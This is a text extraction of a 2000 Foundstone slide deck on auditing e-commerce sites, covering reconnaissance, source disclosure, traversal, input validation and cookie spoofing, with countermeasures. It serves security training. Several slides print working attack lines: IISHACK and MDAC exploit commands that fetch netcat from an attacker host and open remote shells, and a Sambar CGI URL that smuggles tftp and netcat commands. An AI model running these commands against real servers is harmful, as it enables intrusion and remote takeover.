audit and security of e-commerce
TRANSCRIPT
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
1/93
Copyright 2000 Foundstone, Inc.
Audit and Security ofE-Commerce
The attacks are going up the stack.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
2/93
Copyright 2000 Foundstone, Inc.
Audit and Security of E-Commerce
Stuart McClure
President/CTO
Foundstone, Inc.
http://www.foundstone.com
949-367-1743
http://www.foundstone.com/http://www.foundstone.com/ -
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
3/93
Copyright 2000 Foundstone, Inc.
Audit and Security of E-Commerce
Background President/CTO of Foundstone, Inc.
Over 10 years in IT and security Lead author of Hacking Exposed
Digital Battlefield columnist
InfoWorld Security Watch columnist
Former E&Y Security Consultant
InfoWorld product analyst
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
4/93
Copyright 2000 Foundstone, Inc.
Overview
eCommerce Primer
Information gathering
Viewing Source
Application design
File System Traversal
Input Validation
Impersonation
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
5/93
Copyright 2000 Foundstone, Inc.
Ecommerce Primer
Were secure, we have a firewall
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
6/93
Copyright 2000 Foundstone, Inc.
eCommerce Primer
Ecommerce is built on web traffic (TCP port80) which must be allowed throughecommerce firewalls. Firewalls cannot block
most of these attacks.To hack in this untamed world, knowledge ofHTML, DHTML, VBScript, Jscript, Java,Javascript, Perl, CGI, Apache, IIS, Cold
Fusion, CyberCash, ADO, MS Access, MDAC,MS SQL Server, and Oracle helpful and oftenrequired.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
7/93
Copyright 2000 Foundstone, Inc.
Ecommerce Primer
ASCII Hex values: learn them, knowthem, live them
Character Hex Character Hex Character Hex
Space 20 - (hyphen) 2D Z 5A
! 21 . (period) 2E [ 5B
22 / 2F \ 5C
# 23 0 30 ] 5D
$ 24 9 39 ^ 5E
% 25 : 3A _ 5F
& 26 ; 3B ` 60
(apostrophe) 27 < 3C a 61
( 28 = 3D z 7A
) 29 > 3E { 7B
* 2A ? 3F | 7C
+ 2B @ 40 } 7D
, (comma) 2C A 41 ~ 7E
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
8/93
Copyright 2000 Foundstone, Inc.
eCommerce Primer
Most attackers look for the low hangingfruit first. They scan for web ports,
search for vulnerable software orscripts, and then attack.
The more sophisticated attacks require
an in-depth knowledge of the innerworkings of web scripts (all of whichcan be learned).
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
9/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Gather as much information about asite as possible to understand its
purpose, function, and most important,its design.
Determine if any low-hanging fruit is
available for picking.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
10/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Methodology Web reconnaissance
Vulnerability scanning
Site duplication
Keyword searching
Email addresses
External linkage
Commented code
Key field enumeration
Scripting language enumeration
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
11/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Enumerate a web server searching for
every web application including alternatemanagement servers, transactionapplications, certificate servers, etc.
Port scanning and enumeration will revealvolumes about the target systems.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
12/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Port scanning
TCP and UDP ports 1-65535 Common web ports
80, 81, 88, 443, 2301, 2779, 8000, 8001, 8080, etc.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
13/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Port scanning
Network Mapper (nmap) by Fyodor(http://www.insecure.org)
[/opt]# nmap -sT -n -P0 -p 80,88,8000,2799 192.168.51.210
Starting nmap V. 2.12 by Fyodor ([email protected], )
Interesting ports on (192.168.51.210):Port State Protocol Service
2779 open tcp unknown
http://www.insecure.org/http://www.insecure.org/ -
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
14/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Port scanning
SuperScan byRobin Keir
(www.keir.net)
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
15/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Enumeration
Web server vendor and versionWeb server directory structure
SSL web server vendor and version
Web mind meld
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
16/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance Enumeration
Netcat by Hobbit (http://www.l0pht.com/~weld)
The Swiss Army knife of hackers
TCP (both NT and Unix) and UDP (Unix only)
Raw TCP or UDP connection
Command/shell/program execution
Source routing
Port redirector
Telnet server
Port scanner
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
17/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Enumeration
Web server vendor and version Netcat (nc)
[/opt]# nc 192.168.51.210 2779HEAD / HTTP/1.0
HTTP/1.1 403 Access ForbiddenServer:Microsoft-IIS/5.0Date: Sat, 26 Feb 2000 01:06:03 GMT
Content-Length: 3286
Content-Type: text/html
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
18/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Enumeration
Grinder 1.1by Rhino9
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
19/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Enumeration
Hidden redirection Using HTTP-EQUIV, web sites redirect visitors to
other parts of the server or other servers. Anattacker can glean this information and use the newinformation as targets for an attack.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
20/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Enumeration
Netcat (nc) HTTP EQUIV discoveryC:\>nc www.site.com 80GET / HTTP/1.0
HTTP/1.1 200 OK
Date: Sun, 27 Feb 2000 23:21:52 GMT
Server: Microsoft-IIS/5.0
Connection: closeContent-Type: text/html
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
21/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance Enumeration
Secure Sockets Layer (SSL) Privacy protocol implementing symmetric keycryptography (DES, RC4), authentication (RSA, DSS),and message integrity (MD5, SHA)
Transport Layer Security (TSL) is the latest version ofSSL.
OpenSSL/SSLeay An open source toolkit for implementing SSL and TSL
in applications.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
22/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Web reconnaissance
Enumeration
OpenSSL/SSLeaySSLeay>s_client -connect www.ramsec.com:443CONNECTED(00000003)
HEAD / HTTP/1.0
HTTP/1.1 200 OKServer: Microsoft-IIS/4.0
Content-Location: http://216.182.36.154/index.html
Date: Sat, 26 Feb 2000 00:59:07 GMT
Last-Modified: Thu, 10 Feb 2000 22:52:52 GMT
read:errno=0
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
23/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Vulnerability checking
Web vulnerability scanner checking for
known holes in application files and design. CGIscan by Bronc Buster (1998)
Sitescan by Rhino9
Whisker by Rain Forrest Puppy (1999)
http://www.wiretrip.net/rfp
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
24/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Vulnerability checking
Whisker (NT and Unix)-- whisker / v1.3.0a / rain forest puppy / ADM / wiretrip --
- Loaded script database of 1691 lines
= - = - = - = - = - =
= Host: www.hackingexposed.com
= Server: Apache/3.3.3 (Unix)
+ 404 Not Found: GET /cfdocs/
+ 404 Not Found: GET /cfide/Administrator/startstop.html
+ 404 Not Found: GET /cfappman/index.cfm
+ 403 Forbidden: GET /cgi-bin/
+ 404 Not Found: GET /cgi-bin/dbmlparser.exe
+ 404 Not Found: HEAD /cgi-bin/webdist.cgi
+ 404 Not Found: HEAD /cgi-bin/handler
+ 404 Not Found: HEAD /mall_log_files/order.log
+ 404 Not Found: HEAD /PDG_Cart/
+ 404 Not Found: HEAD /quikstore.cfg
+ 404 Not Found: HEAD /orders/
+ 404 Not Found: HEAD /Admin_files/order.log+ 404 Not Found: HEAD /bigconf.cgi
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
25/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Site duplication Web spider programs
Automatic web retriever and mirroring programs that
follow every link, copying readable files such as .HTM,.HTML, .DHTML, .JHTML, .SHTML, .XML, etc.
It does not retrieve .CGI, .ASP, .CFM or dynamicallygenerated pages.
Manual searchingView Source
Save As
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
26/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Site duplication
Wget Unix based, GNU Wget 1.5.3
Standard on most Linux distributions ordownload from http://www.freshmeat.org
non-interactive network retriever
HTTP and FTP retrieval
Proxy supportAuthentication support
Include/exclude list of URLs
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
27/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Wget[/opt]#wget -r -m -v www.ramsec.com
--13:33:34-- http://www.ramsec.com:80/ =>`www.ramsec.com/index.htmlConnecting to www.ramsec.com:80... connected!HTTP request sent, awaiting response... 200 OKLength: 11,731 [text/html]
0K -> .......... . [100%]
13:33:35 (25.57 KB/s) - `www.ramsec.com/index.html' saved[11731/11731]
http://www.ramsec.com/http://www.ramsec.com/ -
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
28/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Site duplication Teleport Pro 1.29 by Tennyson Maxwell
Information Systems, Inc.(http://www.tenmax.com) Proxy support
Authentication support
Multi-threaded
Advanced filters
http://www.tenmax.com/http://www.tenmax.com/ -
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
29/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Teleport Pro results:
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
30/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Site duplication Countermeasures
Garbage.cgi
Rootshell once had an obscure link on theirinitial page which ran a CGI script that spit outendless amounts of data. This effectively tiedup the web pilfering.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
31/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Keyword searching
Searching web site code to find hidden
treasures such as usernames, passwords,email addresses, external links, externalimages, etc.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
32/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Keyword searching
With wget on Unix:
grep pass *.html Teleport Pro on NT:
findstr pass *.html
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
33/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Email address
Searching a web site for email addresses
can unearth usernames, externalrelationships, and points of attack.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
34/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Email addresses
Wget (offline)
Teleport Pro (offline) Sam Spade (http://www.samspade.org)
Whois, ping, traceroute, ARIN, SMTP, finger,etc.
Online crawl website function!
BlackWidow by SoftByteLabs.com
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
35/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Email addresses wget
[/opt]# grep @ *.htmlindex.html: For additionalinformation, contact: [email protected]
index.html:HREF="mailto:[email protected]">webmaster@ramse
c.com
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
36/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Email addresses Teleport ProD:\>findstr "@" *.htm?
about_us.html: HREF="mailto:[email protected]">[email protected]&nb
sp;
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
37/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Email addresses
Sam Spade
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
38/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Email addresses
Black Widow
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
39/93
Copyright 2000 Foundstone, Inc.
Information Gathering
External linkage
Links to web pages or graphics on other
systems than the target.An external link can imply a relationship of
sorts and provide alternate targets for theattacker.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
40/93
Copyright 2000 Foundstone, Inc.
Information Gathering
External linkage
Sam Spade
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
41/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Commented code
Searching for commented code can provide
insight into the sites design such asapplications, languages used, programminghints, etc.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
42/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Commented code
Manual technique is most effective
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
43/93
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
44/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Key field enumeration
Learn the name and type of key fields used
in dynamic scripts (.CGI, .ASP, .CFM).http://www.site.com/Login.asp?id=486&fu=http%3
A%2F%2Fwww%2ESramsec%2Ecom%2Fdirectory%2FDef
ault%2Easp&cw=100&sf=0&kv=1&cc=9442568&Oi=1
id, fu, cw, sf, kv, cc, Oi are input fields to thelogin.asp script.
http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1http://www.site.com/Login.asp?id=486&fu=http://www.Sramsec.com/directory/Default.asp&cw=100&sf=0&kv=1&cc=9442568&Oi=1 -
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
45/93
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
46/93
Copyright 2000 Foundstone, Inc.
Information Gathering
Scripting language enumeration
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
47/93
Copyright 2000 Foundstone, Inc.
Viewing Source
Numerous bugs or poor web designsallow an attacker to view web source
code, for example, .ASP or .CGI codecan be viewed within the browser.
An attacker can discover internal web
design or worse, internally usedusernames and passwords for databaseaccess.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
48/93
Copyright 2000 Foundstone, Inc.
Viewing Source
Methodology
Active Server Pages (ASP)
Common Gateway Interface (CGI) ColdFusion Server (CFM)
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
49/93
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
50/93
Copyright 2000 Foundstone, Inc.
Viewing Source
ASP vulnerabilities
Dot bug
Countermeasures Upgrade to IIS 4.0 or above
Apply the IIS 3.0 patch:
ftp://ftp.microsoft.com/bussys/IIS/iis-
public/fixes/usa/security/fesrc-fix
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
51/93
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
52/93
Copyright 2000 Foundstone, Inc.
Viewing Source
ASP vulnerabilities Alternate Data Streams bug
Countermeasure
Remove read access on files for Everyone group Apply patches
For IIS 3.0:
ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security/iis3-datafix/
For IIS 4.0:
ftp://ftp.microsoft.com/bussys/IIS/iis-public/fixes/usa/security
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
53/93
Copyright 2000 Foundstone, Inc.
Viewing Source
Common Gateway Interface (CGI) CGI design flaws
CGIs that read and display an HTML file can betricked into reading itself and thereforedisplaying its contents.
http://www.site.com/index.cgi?page=main.html
Can be changed to:
http://www.site.com/index.cgi?page=index.cgi
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
54/93
Copyright 2000 Foundstone, Inc.
Viewing Source
ColdFusion Server By Allaire (www.allaire.com)
Numerous bugs in 4.0 (1999) Upload a file onto the web server:
http://www.site.com/cfdocs/expeval/openfile.cfm
View a file on the web server with theExpression Evaluator:
http://www.site.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
55/93
Copyright 2000 Foundstone, Inc.
Viewing Source
ColdFusion Server
Countermeasures
Remove the scripts from the web serverApply the patch:
http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
56/93
Copyright 2000 Foundstone, Inc.
File System Traversal
Vulnerabilities and misconfigurationsmay gain unauthorized access to files
and directories on the web server.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
57/93
Copyright 2000 Foundstone, Inc.
File System Traversal
Methodology
Dot dot bugs
Dot listings Tilde usage
Compaq Insight Manager
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
58/93
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
59/93
Copyright 2000 Foundstone, Inc.
File System Traversal
Dot listings
Web server misconfiguration or
vulnerability which allows an attacker todisplay the current directorys file listing.
For example, the Novells Groupwise WebGateway web server allows for virtual
directory displaying:http://www.infoworld.com/us/.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
60/93
Copyright 2000 Foundstone, Inc.
File System Traversal
Tilde usage
Web server vulnerability allowing an
attacker to escape the root directory of theweb server and view the contents of theparticular user on the system.
For example, might display the contents of
the root users directory:http://www.infoworld.com/~root/
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
61/93
Copyright 2000 Foundstone, Inc.
File System Traversal
Compaq Insight Manager (CIM)
Re-discovered in 1999
CIM web server allowed an attacker toexploit the dot dot command in a browserto download any file on the system
A good test to determine if a system is
vulnerable is to look for C:\BOOT.INI
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
62/93
Copyright 2000 Foundstone, Inc.
Input Validation
Web applications can often be trickedinto accepting invalid input for
processing, making it cough upsensitive information, or worse, crashthe application.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
63/93
Copyright 2000 Foundstone, Inc.
Input Validation
Methodology Metacharacters
Field overflows
Application buffer overflows Hex character replacement
Server side includes (SSI)
Hidden tags
Server side debugging Extending Javascript
Data access bypassing
Local command execution
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
64/93
Copyright 2000 Foundstone, Inc.
Input Validation
Metacharacters Depending on the input sanitation being
performed on the server, it may be possible to
submit metacharacters as a parameter and get theserver to return unexpected results. For example:
http://www.site.com/login.cgi?..&&&&&&&&&
may actually choke the web server or producedebugging information.
http://www.site.com/login.cgi?..&&&&&&&&&http://www.site.com/login.cgi?..&&&&&&&&&http://www.site.com/login.cgi?..&&&&&&&&&http://www.site.com/login.cgi?..&&&&&&&&& -
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
65/93
Copyright 2000 Foundstone, Inc.
Input Validation
Field overflows
Poor field length checking may allow an
attacker to submit large character fieldcausing unexpected results or sometimescrashing the server (use with caution).
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
66/93
Copyright 2000 Foundstone, Inc.
Input Validation
Field overflows
Hidden tag SIZE
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
67/93
Copyright 2000 Foundstone, Inc.
Input Validation
Field overflows
Hidden tag SUBMIT
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
68/93
Copyright 2000 Foundstone, Inc.
Input Validation
Field overflows
Unexpected results
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
69/93
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
70/93
Copyright 2000 Foundstone, Inc.
Input Validation
Application buffer overflows
IISHACK
iishack.exe (program containing the bufferoverflow and initial instructions to downloadthe ncx.exe file to be executed).
ncx.exe (slim version Netcat executing acommand shell on port 80).
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
71/93
Copyright 2000 Foundstone, Inc.
Input Validation
Application buffer overflows IISHACK (how to exploit)
Setup a web server with ncx.exe in the root directory.
Run iishack.exe:C:\NT\>iishack 192.168.51.1 80 10.1.1.1/ncx.exe
Connect to port 80 on the target:
C:\NT\>nc 192.168.51.1 80
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\>
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
72/93
Copyright 2000 Foundstone, Inc.
Input Validation
Application buffer overflows
IISHACK countermeasure
Apply the IIS 4.0 patch:ftp://ftp.microsoft.com/bussys/IIS/iis-
public/fixes/usa/ext-fix/
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
73/93
Copyright 2000 Foundstone, Inc.
Input Validation
Hex character replacement
Replacing ASCII characters with
hexidecimal can bypass some IDSs lookingfor key strings and it may bypass initialscript parsing for invalid or escapecharacters such as the back tick (` or
%60) and ampersand (& or %36) allowingan attacker to execute commands locallyand/or receive back unexpected results.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
74/93
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
75/93
Copyright 2000 Foundstone, Inc.
Input Validation
Server side includes (SSI)Allows commands to be executed locally on
the system.
For example, on a Unix web serverallowing SSIs you can use the followingcommand to mail the /etc/passwd toyourself:
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
76/93
Copyright 2000 Foundstone, Inc.
Input Validation
Hidden tags HTML hidden tags are frequently used to
store session information such as price,
quantity, and purchase item. These hidden tags can be modified and
resubmitted. And if no backend processingis performed, a product can be purchased
for a much reduced price (e.g. a BMWfor the cost of a matchbox car.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
77/93
Copyright 2000 Foundstone, Inc.
Input Validation
Server side debugging
Server side application debugging features
may allow additional information to beleaked about the scripts function
http://www.domain.com/cgi-bin/script.cgi?debug=ON,
debug=TRUE).
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
78/93
Copyright 2000 Foundstone, Inc.
Input Validation
Extending Javascript Sites that allow users to input information onto
the site without checking for Javascript content
can allow attackers to insert Javascript code toprompt users for sensitive information.
For example, a recent eBay hack wasaccomplished by inserting Javascript code into adescription of an auction item. When users
selected the description they were prompted toenter their online userid and password which wassent to the attacker
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
79/93
Copyright 2000 Foundstone, Inc.
Input Validation
Local command execution
Vulnerabilities in web server, script
parameter processing, or rogue files mayallow an attacker to execute localcommands on the affected systems.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
80/93
Copyright 2000 Foundstone, Inc.
Input Validation
Local command execution
MDAC
IISs MDAC component has a vulnerabilitywhere an attacker can submit commands forlocal execution.
Written by Rain Forest Puppy (RFP)
Exploit and fix can be found atwww.wiretrip.net/rfp
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
81/93
Copyright 2000 Foundstone, Inc.
Input Validation
Local command execution
MDAC detecting vulnerable systems
C:\>nc -nvv -w 2 192.168.51.1 80GET /msadc/msadcs.dll HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 19 Dec 1999 18:32:10 GMT
Content-Type: application/x-vargContent-Length: 6
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
82/93
Copyright 2000 Foundstone, Inc.
Input Validation
Local command execution
MDAC sending the exploit
C:\>mdac.pl -h 192.168.51.1 -t 192.168.51.102 -i192.168.51.102 -p 44444
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Command:
cmd /c cd %SystemRoot%&&tftp -i 192.168.51.102 GET nc.exe
nc.exe&&del ftptmp && attrib -r nc.exe && PROMPT=hacked $p$g&& nc.exe -e cmd.exe 192.168.51.102 44444
Step 1: Trying raw driver to btcustmr.mdb
winnt -> c: Success!
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
83/93
Copyright 2000 Foundstone, Inc.
Input Validation
Local command execution
MDAC getting the prompt
C:\>nc -l -p 44444
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
hacked C:\WINNT>
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
84/93
Copyright 2000 Foundstone, Inc.
Input validation
Local command execution
Sambar CGI vulnerability (2/23/00)
Batch files in cgi-bin allow local commandexecution Hello.bat
Echo.bat
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
85/93
Copyright 2000 Foundstone, Inc.
Input validation
Local command execution
Sambar hack
http://www.site.com/cgi-bin/hello.bat?&tftp%20
-i%20GET%20nc.exe%20c:\temp\nc.exe&c:\nc.exe
%20-L%20-p%204000%20-e%20cmd.exe
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
86/93
Copyright 2000 Foundstone, Inc.
Impersonation
Impersonating another web user can beaccomplished by understanding the way
authentication is performed on theserver.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
87/93
Copyright 2000 Foundstone, Inc.
Impersonation
Methodology
Determine state tracking
Attempt to reverse engineer the cookieencryption method
Spoof cookies to impersonate a user
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
88/93
Copyright 2000 Foundstone, Inc.
Impersonation
Determine state tracking
All ecommerce sites must track a usersstate in some manner.
TCP (and therefore HTTP) is by its nature,stateless, making it difficult to associateweb requests to an individual.
The cookie solution.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
89/93
Copyright 2000 Foundstone, Inc.
Impersonation
Determine state tracking Cookies allow a web developer to track
and remember a user while shopping by
inserting information into the cookie file. Netscape:
C:\PROGRAM FILES\NETSCAPE\USERS\DEFAULT\COOKIE.TXT
IE:
C:\WINNT\PROFILES\ADMINISTRATOR\COOKIES
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
90/93
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
91/93
Copyright 2000 Foundstone, Inc.
Impersonation
Determine state tracking
Cookie Pal by Kookaburra Software(http://www.kburra.com/)
http://www.kburra.com/http://www.kburra.com/ -
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
92/93
Copyright 2000 Foundstone, Inc.
Impersonation
Determine state tracking Reverse engineer the cookie state
information and you will be able to make
purchases as someone else. Often based on a combination of
name/password/date/time/IP address, orsome relevant data.
Usually some form of XOR or DESencryption.
-
7/30/2019 AUDIT AND SECURITY OF E-COMMERCE
93/93
Wrap-up
Overview Background and Primer
Information gathering
Viewing Source
Application design
File System Traversal
Input Validation Impersonation